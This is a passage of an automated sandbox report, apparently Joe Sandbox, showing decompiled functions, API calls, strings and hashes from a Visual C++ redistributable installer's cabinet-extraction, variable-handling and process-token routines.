                                                                          • Opcode ID: 65bbcaec32bef088ffab385eccf1fee6a0645247208bdc64c1d38b549e1ae693
                                                                          • Instruction ID: 83bfba997f6b63877cad224bddbfec9fdd88b675da56fe743aeee48102717313
                                                                          • Opcode Fuzzy Hash: 65bbcaec32bef088ffab385eccf1fee6a0645247208bdc64c1d38b549e1ae693
                                                                          • Instruction Fuzzy Hash: CC31EFB0E41608AFFB18EF25EC56B5A3AE5B744700740842DE60EF6260D77EA880DF44
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00031484 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 103COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 64%
                                                                          			E00031484(void* _a4, intOrPtr _a8) {
				void* _t11;
				void* _t12;
				void* _t13;
				void* _t29;
				void* _t30;

				_t29 = _a4;
				 *(_t29 + 0x3c) =  *(_t29 + 0x3c) | 0xffffffff;
				_t30 = E000121A5(_t29 + 0x1c, _a8, 0);
				if(_t30 >= 0) {
					_t11 = CreateEventW(0, 1, 0, 0);
					 *(_t29 + 0x24) = _t11;
					if(_t11 != 0) {
						_t12 = CreateEventW(0, 1, 0, 0);
						 *(_t29 + 0x28) = _t12;
						if(_t12 != 0) {
							_t13 = CreateThread(0, 0, E00030E43, _t29, 0, 0); // executed
							 *(_t29 + 0x20) = _t13;
							if(_t13 != 0) {
								_t30 = E00031224(_t29);
								if(_t30 < 0) {
									_push("Failed to wait for operation complete.");
									goto L10;
								}
							} else {
								_t34 =  <=  ? GetLastError() : _t17 & 0x0000ffff | 0x80070000;
								_t30 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t17 & 0x0000ffff | 0x80070000;
								E000137D3(0x80004005, "cabextract.cpp", 0x93, _t30);
								_push("Failed to create extraction thread.");
								goto L10;
							}
						} else {
							_t37 =  <=  ? GetLastError() : _t20 & 0x0000ffff | 0x80070000;
							_t30 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t20 & 0x0000ffff | 0x80070000;
							E000137D3(0x80004005, "cabextract.cpp", 0x8f, _t30);
							_push("Failed to create operation complete event.");
							goto L10;
						}
					} else {
						_t40 =  <=  ? GetLastError() : _t23 & 0x0000ffff | 0x80070000;
						_t30 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t23 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "cabextract.cpp", 0x8c, _t30);
						_push("Failed to create begin operation event.");
						goto L10;
					}
				} else {
					_push("Failed to copy file name.");
					L10:
					_push(_t30);
					E0005012F();
				}
				return _t30;
			}








                                                                          0x0003148a
                                                                          0x00031493
                                                                          0x000314a0
                                                                          0x000314a4
                                                                          0x000314bb
                                                                          0x000314bd
                                                                          0x000314c2
                                                                          0x00031501
                                                                          0x00031503
                                                                          0x00031508
                                                                          0x00031549
                                                                          0x0003154f
                                                                          0x00031554
                                                                          0x00031591
                                                                          0x00031595
                                                                          0x00031597
                                                                          0x00000000
                                                                          0x00031597
                                                                          0x00031556
                                                                          0x00031567
                                                                          0x00031571
                                                                          0x0003157f
                                                                          0x00031584
                                                                          0x00000000
                                                                          0x00031584
                                                                          0x0003150a
                                                                          0x0003151b
                                                                          0x00031525
                                                                          0x00031533
                                                                          0x00031538
                                                                          0x00000000
                                                                          0x00031538
                                                                          0x000314c4
                                                                          0x000314d5
                                                                          0x000314df
                                                                          0x000314ed
                                                                          0x000314f2
                                                                          0x00000000
                                                                          0x000314f2
                                                                          0x000314a6
                                                                          0x000314a6
                                                                          0x0003159c
                                                                          0x0003159c
                                                                          0x0003159d
                                                                          0x000315a3
                                                                          0x000315aa

                                                                          APIs
                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,0001C285,?,00000000,?,0001C319), ref: 000314BB
                                                                          • GetLastError.KERNEL32(?,0001C285,?,00000000,?,0001C319,000152FD,?,?,0001533D,0001533D,00000000,?,00000000), ref: 000314C4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CreateErrorEventLast
                                                                          • String ID: @Met$Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
                                                                          • API String ID: 545576003-2765212422
                                                                          • Opcode ID: b63a4bbb943ca773830fa28cc14ffbed97c098129909c8470106878adaf9584e
                                                                          • Instruction ID: 4499301b36eaa2a603d3d3fb15db7d183a13050d57c73ea91f5ab934f80d0e32
                                                                          • Opcode Fuzzy Hash: b63a4bbb943ca773830fa28cc14ffbed97c098129909c8470106878adaf9584e
                                                                          • Instruction Fuzzy Hash: 7921D1B2B44B26BAF32266795C41AA775DCEF497A0F010222BD06FB181E754DC0089F6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00030627 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 103fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 72%
                                                                          			E00030627(void* __ecx, CHAR* _a4) {
				void* _v8;
				long _t18;
				void* _t19;
				signed short _t22;
				void* _t27;
				int _t29;
				signed short _t33;
				signed int _t36;
				int _t37;
				signed int _t40;
				void** _t44;
				void* _t47;

				_push(__ecx);
				_t40 =  *0x7aac0; // 0x0
				_push(_t36);
				_t37 = _t36 | 0xffffffff;
				_t47 = 0;
				_v8 = _t37;
				_t44 =  *( *((intOrPtr*)( *[fs:0x2c] + _t40 * 4)) + 4);
				_t18 = CompareStringA(0, 0, "<the>.cab", _t37, _a4, _t37); // executed
				if(_t18 != 2) {
					_t19 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x8000080, 0);
					_v8 = _t19;
					if(_t19 == _t37) {
						_t22 = GetLastError();
						_t51 =  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
						_t47 =  >=  ? 0x80004005 :  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "cabextract.cpp", 0x2d5, _t47);
						E0005012F(_t47, "Failed to open cabinet file: %hs", _a4);
					}
					L8:
					_t44[0xc] = _t47;
					_t21 =  <  ? _t37 : _v8;
					return  <  ? _t37 : _v8;
				}
				_t27 = GetCurrentProcess();
				_t29 = DuplicateHandle(GetCurrentProcess(),  *_t44, _t27,  &_v8, 0, 0, _t18); // executed
				if(_t29 != 0) {
					_t47 = E000304BE(_t40,  &(_t44[7]), _v8, _t44[2], _t44[3]);
					if(_t47 >= 0) {
						goto L8;
					}
					_push("Failed to add virtual file pointer for cab container.");
					L3:
					_push(_t47);
					E0005012F();
					goto L8;
				}
				_t33 = GetLastError();
				_t55 =  <=  ? _t33 : _t33 & 0x0000ffff | 0x80070000;
				_t47 =  >=  ? 0x80004005 :  <=  ? _t33 : _t33 & 0x0000ffff | 0x80070000;
				E000137D3(0x80004005, "cabextract.cpp", 0x2ca, _t47);
				_push("Failed to duplicate handle to cab container.");
				goto L3;
			}















                                                                          0x0003062a
                                                                          0x0003062b
                                                                          0x00030637
                                                                          0x0003063d
                                                                          0x00030644
                                                                          0x00030646
                                                                          0x00030649
                                                                          0x00030657
                                                                          0x00030660
                                                                          0x000306f0
                                                                          0x000306f6
                                                                          0x000306fb
                                                                          0x000306fd
                                                                          0x0003070e
                                                                          0x00030718
                                                                          0x00030726
                                                                          0x00030734
                                                                          0x00030739
                                                                          0x0003073c
                                                                          0x0003073c
                                                                          0x00030746
                                                                          0x0003074d
                                                                          0x0003074d
                                                                          0x0003066f
                                                                          0x00030677
                                                                          0x0003067f
                                                                          0x000306d0
                                                                          0x000306d4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000306d6
                                                                          0x000306b4
                                                                          0x000306b4
                                                                          0x000306b5
                                                                          0x00000000
                                                                          0x000306bb
                                                                          0x00030681
                                                                          0x00030692
                                                                          0x0003069c
                                                                          0x000306aa
                                                                          0x000306af
                                                                          0x00000000

                                                                          APIs
                                                                          • CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 00030657
                                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0003066F
                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 00030674
                                                                          • DuplicateHandle.KERNELBASE(00000000,?,?), ref: 00030677
                                                                          • GetLastError.KERNEL32(?,?), ref: 00030681
                                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 000306F0
                                                                          • GetLastError.KERNEL32(?,?), ref: 000306FD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
                                                                          • String ID: <the>.cab$@Met$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
                                                                          • API String ID: 3030546534-1066054086
                                                                          • Opcode ID: efd1b9959b02ef73878d83433c724e0e861af4b104ee8535ea2476800c1eebf2
                                                                          • Instruction ID: 6d0d5f76565920e16208aa4c85b41df1dc197c254f44b353c6d8f007564521a9
                                                                          • Opcode Fuzzy Hash: efd1b9959b02ef73878d83433c724e0e861af4b104ee8535ea2476800c1eebf2
                                                                          • Instruction Fuzzy Hash: D7312672A01725BBEB216BA58C49F9B7AEDEF05760F000125FD08F7190C7249D10CAE5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00016C5D Relevance: 19.7, APIs: 2, Strings: 11, Instructions: 167COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 46%
                                                                          			E00016C5D(void* __ecx, struct _CRITICAL_SECTION* _a4, intOrPtr _a8, signed int* _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				unsigned int _v12;
				signed int _t44;
				signed int _t53;
				void* _t55;
				void* _t57;
				struct _CRITICAL_SECTION* _t68;
				void* _t69;
				signed int _t70;
				signed int _t74;
				signed int _t75;
				unsigned int _t79;
				intOrPtr _t80;
				void* _t81;
				intOrPtr _t82;
				signed int* _t83;
				void* _t84;

				_t69 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t68 = _a4;
				EnterCriticalSection(_t68);
				_t80 = _a8;
				_t81 = E000155B6(_t69, _t68, _t80,  &_v8);
				if(_t81 >= 0) {
					_t44 = _v8;
					if(_t81 != 1) {
						_t77 =  *(_t68 + 0x20);
						_t70 = _t44 * 0x38;
						_t82 =  *((intOrPtr*)(_t70 + _t77 + 0x2c));
						if(_t82 <= 0 || _a20 == 1 || _a20 == 2 &&  *((intOrPtr*)(_t70 + _t77 + 0x28)) != 0 || _a20 == 3 && _t82 != 2) {
							L14:
							_t83 = _a12;
							if(_a24 == 0) {
								L31:
								_a20 = _v8 * 0x38;
								_t81 = E0003035B(_t77,  *(_t68 + 0x20) + 8 + _v8 * 0x38, _t83);
								if(_t81 >= 0) {
									 *((intOrPtr*)( *(_t68 + 0x20) + _a20 + 0x24)) = _a16;
									goto L34;
								}
								_push(_t80);
								_push("Failed to set value of variable: %ls");
								goto L2;
							}
							_t77 =  *(_t68 + 0x20);
							_t74 = _t44 * 0x38;
							if( *((intOrPtr*)(_t74 + _t77 + 0x2c)) != 0) {
								goto L31;
							}
							if( *((intOrPtr*)(_t74 + _t77 + 0x20)) == 0) {
								_t53 = _t83[4];
								if(_t53 == 0) {
									if( *((intOrPtr*)(_t74 + _t77 + 0x18)) == 0) {
										goto L31;
									}
									_push( *_t83);
									L29:
									_push(_t80);
									_push("Unsetting variable \'%ls\'");
									L30:
									_push(2); // executed
									E0005061A(); // executed
									_t84 = _t84 + 0x10;
									goto L31;
								}
								_t55 = _t53 - 1;
								if(_t55 == 0) {
									_push(_t83[1]);
									_push( *_t83);
									E0005061A(2, "Setting numeric variable \'%ls\' to value %lld", _t80);
									_t84 = _t84 + 0x14;
									goto L31;
								}
								_t57 = _t55 - 1;
								if(_t57 == 0) {
									if( *_t83 != 0) {
										_push( *_t83);
										_push(_t80);
										_push("Setting string variable \'%ls\' to value \'%ls\'");
										goto L30;
									}
									_push(0);
									goto L29;
								}
								if(_t57 == 1) {
									_t75 =  *_t83;
									_t79 = _t83[1];
									_push(_t75 & 0x0000ffff);
									_v12 = _t79;
									_push((_t79 << 0x00000020 | _t75) >> 0x10 & 0x0000ffff);
									_push(_t79 & 0x0000ffff);
									_t77 = _t79 >> 0x10;
									_push(_t79 >> 0x10);
									E0005061A(2, "Setting version variable \'%ls\' to value \'%hu.%hu.%hu.%hu\'", _t80);
									_t84 = _t84 + 0x1c;
								}
								goto L31;
							}
							E0005061A(2, "Setting hidden variable \'%ls\'", _t80);
							_t84 = _t84 + 0xc;
							goto L31;
						} else {
							_t81 = 0x80070057;
							E000137D3(_t44, "variable.cpp", 0x605, 0x80070057);
							_push(_t80);
							_push("Attempt to set built-in variable value: %ls");
							L2:
							_push(_t81);
							E0005012F();
							_t84 = _t84 + 0xc;
							L34:
							LeaveCriticalSection(_t68);
							if(_t81 < 0 && _a24 != 0) {
								_push(_t81);
								E0005061A(2, "Setting variable failed: ID \'%ls\', HRESULT 0x%x", _t80);
							}
							return _t81;
						}
					}
					_t81 = E00016AC6(_t44, _t69, _t68, _t80, _t44);
					if(_t81 >= 0) {
						_t44 = _v8;
						goto L14;
					}
					_push(_t80);
					_push("Failed to insert variable \'%ls\'.");
					goto L2;
				}
				_push(_t80);
				_push("Failed to find variable value \'%ls\'.");
				goto L2;
			}




















                                                                          0x00016c5d
                                                                          0x00016c63
                                                                          0x00016c68
                                                                          0x00016c6e
                                                                          0x00016c74
                                                                          0x00016c82
                                                                          0x00016c86
                                                                          0x00016c9c
                                                                          0x00016ca2
                                                                          0x00016cba
                                                                          0x00016cbd
                                                                          0x00016cc0
                                                                          0x00016cc6
                                                                          0x00016d06
                                                                          0x00016d0a
                                                                          0x00016d0d
                                                                          0x00016dcd
                                                                          0x00016dd5
                                                                          0x00016de3
                                                                          0x00016de7
                                                                          0x00016dfd
                                                                          0x00000000
                                                                          0x00016dfd
                                                                          0x00016de9
                                                                          0x00016dea
                                                                          0x00000000
                                                                          0x00016dea
                                                                          0x00016d13
                                                                          0x00016d16
                                                                          0x00016d1e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00016d29
                                                                          0x00016d43
                                                                          0x00016d46
                                                                          0x00016db9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00016dbb
                                                                          0x00016dbd
                                                                          0x00016dbd
                                                                          0x00016dbe
                                                                          0x00016dc3
                                                                          0x00016dc3
                                                                          0x00016dc5
                                                                          0x00016dca
                                                                          0x00000000
                                                                          0x00016dca
                                                                          0x00016d48
                                                                          0x00016d4b
                                                                          0x00016d9d
                                                                          0x00016da0
                                                                          0x00016daa
                                                                          0x00016daf
                                                                          0x00000000
                                                                          0x00016daf
                                                                          0x00016d4d
                                                                          0x00016d50
                                                                          0x00016d8d
                                                                          0x00016d93
                                                                          0x00016d95
                                                                          0x00016d96
                                                                          0x00000000
                                                                          0x00016d96
                                                                          0x00016d8f
                                                                          0x00000000
                                                                          0x00016d8f
                                                                          0x00016d55
                                                                          0x00016d57
                                                                          0x00016d59
                                                                          0x00016d5f
                                                                          0x00016d62
                                                                          0x00016d6f
                                                                          0x00016d73
                                                                          0x00016d74
                                                                          0x00016d77
                                                                          0x00016d80
                                                                          0x00016d85
                                                                          0x00016d85
                                                                          0x00000000
                                                                          0x00016d55
                                                                          0x00016d33
                                                                          0x00016d38
                                                                          0x00000000
                                                                          0x00016ce6
                                                                          0x00016ce6
                                                                          0x00016cf6
                                                                          0x00016cfb
                                                                          0x00016cfc
                                                                          0x00016c8e
                                                                          0x00016c8e
                                                                          0x00016c8f
                                                                          0x00016c94
                                                                          0x00016e01
                                                                          0x00016e02
                                                                          0x00016e0a
                                                                          0x00016e12
                                                                          0x00016e1b
                                                                          0x00016e20
                                                                          0x00016e2b
                                                                          0x00016e2b
                                                                          0x00016cc6
                                                                          0x00016cac
                                                                          0x00016cb0
                                                                          0x00016d03
                                                                          0x00000000
                                                                          0x00016d03
                                                                          0x00016cb2
                                                                          0x00016cb3
                                                                          0x00000000
                                                                          0x00016cb3
                                                                          0x00016c88
                                                                          0x00016c89
                                                                          0x00000000

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(00000001,?,00000000,0001533D,00000000,00000001), ref: 00016C6E
                                                                            • Part of subcall function 000155B6: CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,00000000,00000007,0001648B,0001648B,?,0001554A,?,?,00000000), ref: 000155F2
                                                                            • Part of subcall function 000155B6: GetLastError.KERNEL32(?,0001554A,?,?,00000000,?,00000000,0001648B,?,00017DDC,?,?,?,?,?), ref: 00015621
                                                                          • LeaveCriticalSection.KERNEL32(00000001,?,00000001), ref: 00016E02
                                                                          Strings
                                                                          • Unsetting variable '%ls', xrefs: 00016DBE
                                                                          • Setting hidden variable '%ls', xrefs: 00016D2C
                                                                          • Setting string variable '%ls' to value '%ls', xrefs: 00016D96
                                                                          • Setting numeric variable '%ls' to value %lld, xrefs: 00016DA3
                                                                          • Attempt to set built-in variable value: %ls, xrefs: 00016CFC
                                                                          • Failed to find variable value '%ls'., xrefs: 00016C89
                                                                          • Failed to set value of variable: %ls, xrefs: 00016DEA
                                                                          • Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 00016E14
                                                                          • Failed to insert variable '%ls'., xrefs: 00016CB3
                                                                          • variable.cpp, xrefs: 00016CF1
                                                                          • Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 00016D79
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$CompareEnterErrorLastLeaveString
                                                                          • String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
                                                                          • API String ID: 2716280545-445000439
                                                                          • Opcode ID: 2d5693da4dc9162c4dc6e717128e15ec15c4bbede7e9c41f9c94baa20053caef
                                                                          • Instruction ID: 58f148e5df89dd86da48362b013c8d6d6df25f892392f5642966fde6e50d1c6a
                                                                          • Opcode Fuzzy Hash: 2d5693da4dc9162c4dc6e717128e15ec15c4bbede7e9c41f9c94baa20053caef
                                                                          • Instruction Fuzzy Hash: 7851E371F00225ABDB309E14DD4AFFB7AA8EB95705F10011EFC455A282D272DDD5CAE1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00026859 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 68COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 52%
                                                                          			E00026859(void* __ecx, void* _a4, signed int* _a8, intOrPtr* _a12) {
				void* _v8;
				void* _t12;
				int _t14;
				signed int _t17;
				void* _t18;
				signed int* _t29;
				void* _t33;

				_v8 = _v8 | 0xffffffff;
				_t29 = _a8;
				 *_t29 =  *_t29 | 0xffffffff;
				_t12 = GetCurrentProcess();
				_t14 = DuplicateHandle(GetCurrentProcess(), _a4, _t12,  &_v8, 0, 1, 2); // executed
				if(_t14 != 0) {
					_push(_v8);
					_t15 = _a12;
					_push(L"burn.filehandle.attached");
					_t33 = E00011F62(_a12, L"%ls -%ls=%u",  *_t15);
					if(_t33 >= 0) {
						_t17 = _v8;
						 *_t29 = _t17;
						_t18 = _t17 | 0xffffffff;
						_v8 = _t18;
					} else {
						_push("Failed to append the file handle to the command line.");
						goto L2;
					}
				} else {
					_t37 =  <=  ? GetLastError() : _t22 & 0x0000ffff | 0x80070000;
					_t33 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t22 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "core.cpp", 0x3da, _t33);
					_push("Failed to duplicate file handle for attached container.");
					L2:
					_push(_t33);
					E0005012F();
					_t18 = _v8;
				}
				if(_t18 != 0xffffffff) {
					CloseHandle(_t18);
				}
				return _t33;
			}










                                                                          0x0002685d
                                                                          0x0002686c
                                                                          0x00026875
                                                                          0x00026879
                                                                          0x00026882
                                                                          0x0002688a
                                                                          0x000268cc
                                                                          0x000268cf
                                                                          0x000268d2
                                                                          0x000268e4
                                                                          0x000268eb
                                                                          0x000268f4
                                                                          0x000268f7
                                                                          0x000268f9
                                                                          0x000268fc
                                                                          0x000268ed
                                                                          0x000268ed
                                                                          0x00000000
                                                                          0x000268ed
                                                                          0x0002688c
                                                                          0x0002689d
                                                                          0x000268a7
                                                                          0x000268b5
                                                                          0x000268ba
                                                                          0x000268bf
                                                                          0x000268bf
                                                                          0x000268c0
                                                                          0x000268c5
                                                                          0x000268c9
                                                                          0x00026902
                                                                          0x00026905
                                                                          0x00026905
                                                                          0x00026912

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(000000FF,00000000,00000001,00000002,?,00000000,?,?,00014D0B,?,?), ref: 00026879
                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,?,00014D0B,?,?), ref: 0002687F
                                                                          • DuplicateHandle.KERNELBASE(00000000,?,?,00014D0B,?,?), ref: 00026882
                                                                          • GetLastError.KERNEL32(?,?,00014D0B,?,?), ref: 0002688C
                                                                          • CloseHandle.KERNEL32(000000FF,?,00014D0B,?,?), ref: 00026905
                                                                          Strings
                                                                          • Failed to append the file handle to the command line., xrefs: 000268ED
                                                                          • %ls -%ls=%u, xrefs: 000268D9
                                                                          • Failed to duplicate file handle for attached container., xrefs: 000268BA
                                                                          • burn.filehandle.attached, xrefs: 000268D2
                                                                          • core.cpp, xrefs: 000268B0
                                                                          • @Met, xrefs: 0002688C
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentHandleProcess$CloseDuplicateErrorLast
                                                                          • String ID: %ls -%ls=%u$@Met$Failed to append the file handle to the command line.$Failed to duplicate file handle for attached container.$burn.filehandle.attached$core.cpp
                                                                          • API String ID: 4224961946-3980959953
                                                                          • Opcode ID: 2acc5cbbdf49eb2eddff20a02e992ae7c2d62f2e7f743d7489f52ca182ba4ad3
                                                                          • Instruction ID: f927db3ba00f8a074a3709bae21620b1db9efa250e99c5e83497d97c59bdeba7
                                                                          • Opcode Fuzzy Hash: 2acc5cbbdf49eb2eddff20a02e992ae7c2d62f2e7f743d7489f52ca182ba4ad3
                                                                          • Instruction Fuzzy Hash: 05119331A40725FBDB20ABB99D05A9F7BADAF04B31F100326F910EB1E1DB759D0196A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0005076C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 76%
                                                                          			E0005076C(void* _a4, signed int* _a8) {
				void* _v8;
				void _v12;
				long _v16;
				int _t20;
				signed short _t27;
				long _t31;

				_t31 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				if(OpenProcessToken(_a4, 8,  &_v8) != 0) {
					_t20 = GetTokenInformation(_v8, 0x14,  &_v12, 4,  &_v16); // executed
					if(_t20 == 0) {
						_t31 =  <=  ? GetLastError() : 0x80004005 & 0x0000ffff | 0x80070000;
						if(_t31 != 0x80070057) {
							if(_t31 < 0) {
								_push(_t31);
								_push(0x35);
								goto L8;
							}
						} else {
							_t31 = 0;
							 *_a8 = 0;
						}
					} else {
						 *_a8 = 0 | _v12 != 0x00000000;
					}
				} else {
					_t27 = GetLastError();
					_t36 =  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
					_t31 =  >=  ? 0x80004005 :  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
					_push(_t31);
					_push(0x21);
					L8:
					_push("procutil.cpp");
					E000137D3(0x80004005);
				}
				if(_v8 != 0) {
					FindCloseChangeNotification(_v8); // executed
				}
				return _t31;
			}









                                                                          0x0005077f
                                                                          0x00050781
                                                                          0x00050784
                                                                          0x00050787
                                                                          0x00050792
                                                                          0x000507c6
                                                                          0x000507ce
                                                                          0x000507f0
                                                                          0x000507f9
                                                                          0x00050806
                                                                          0x00050808
                                                                          0x00050809
                                                                          0x00000000
                                                                          0x00050809
                                                                          0x000507fb
                                                                          0x000507fe
                                                                          0x00050800
                                                                          0x00050800
                                                                          0x000507d0
                                                                          0x000507db
                                                                          0x000507db
                                                                          0x00050794
                                                                          0x00050794
                                                                          0x000507a5
                                                                          0x000507af
                                                                          0x000507b2
                                                                          0x000507b3
                                                                          0x0005080b
                                                                          0x0005080b
                                                                          0x00050810
                                                                          0x00050810
                                                                          0x00050818
                                                                          0x0005081d
                                                                          0x0005081d
                                                                          0x0005082a

                                                                          APIs
                                                                          • OpenProcessToken.ADVAPI32(?,00000008,?,000152B5,00000000,?,?,?,?,?,?,?,000274AB,00000000), ref: 0005078A
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,000274AB,00000000), ref: 00050794
                                                                          • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,000274AB,00000000), ref: 000507C6
                                                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,000274AB,00000000), ref: 0005081D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Token$ChangeCloseErrorFindInformationLastNotificationOpenProcess
                                                                          • String ID: @Met$procutil.cpp
                                                                          • API String ID: 2387526074-2144224329
                                                                          • Opcode ID: 291e091ebc82f436029ed11bf2e9d0b04615a659520eabdb46aa3a9279210c9e
                                                                          • Instruction ID: adf3a2e8fc910710cbe0ec1d9c531b8bfb5d0d1a398f6f2380fd03cf45cb6e59
                                                                          • Opcode Fuzzy Hash: 291e091ebc82f436029ed11bf2e9d0b04615a659520eabdb46aa3a9279210c9e
                                                                          • Instruction Fuzzy Hash: 03219671D40328EBEB209B958C48AAFBBE8EF54712F114166ED15E7190D7749E08DBD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000307E4 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 99COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 59%
